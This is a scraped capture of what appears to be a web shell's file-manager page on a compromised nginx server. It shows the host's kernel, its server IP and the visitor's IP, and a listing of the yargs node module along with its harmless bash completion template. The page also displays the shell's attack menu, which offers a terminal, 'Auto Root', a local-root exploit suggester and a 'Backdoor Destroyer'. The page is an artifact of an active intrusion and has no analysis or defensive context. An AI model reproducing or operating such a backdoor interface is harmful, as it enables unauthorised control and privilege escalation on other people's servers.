Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 13.59.91.46
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
unp-musonza /
node_modules /
yargs /
Delete
Unzip
Name
Size
Permission
Date
Action
lib
[ DIR ]
drwxr-xr-x
2021-02-04 21:24
locales
[ DIR ]
drwxr-xr-x
2021-02-04 21:24
node_modules
[ DIR ]
drwxr-xr-x
2021-02-04 21:24
CHANGELOG.md
68.58
KB
-rw-r--r--
2017-06-12 23:26
LICENSE
1.17
KB
-rw-r--r--
2017-01-07 20:44
README.md
3.27
KB
-rw-r--r--
2017-06-12 23:05
completion.sh.hbs
751
B
-rw-r--r--
2017-01-07 20:44
index.js
853
B
-rw-r--r--
2017-03-27 07:10
package.json
2.52
KB
-rw-r--r--
2021-02-04 21:24
yargs.js
32.41
KB
-rw-r--r--
2017-05-01 16:54
Save
Rename
###-begin-{{app_name}}-completions-### # # yargs command completion script # # Installation: {{app_path}} completion >> ~/.bashrc # or {{app_path}} completion >> ~/.bash_profile on OSX. # _yargs_completions() { local cur_word args type_list cur_word="${COMP_WORDS[COMP_CWORD]}" args=("${COMP_WORDS[@]}") # ask yargs to generate completions. type_list=$({{app_path}} --get-yargs-completions "${args[@]}") COMPREPLY=( $(compgen -W "${type_list}" -- ${cur_word}) ) # if no match was found, fall back to filename completion if [ ${#COMPREPLY[@]} -eq 0 ]; then COMPREPLY=( $(compgen -f -- "${cur_word}" ) ) fi return 0 } complete -F _yargs_completions {{app_name}} ###-end-{{app_name}}-completions-###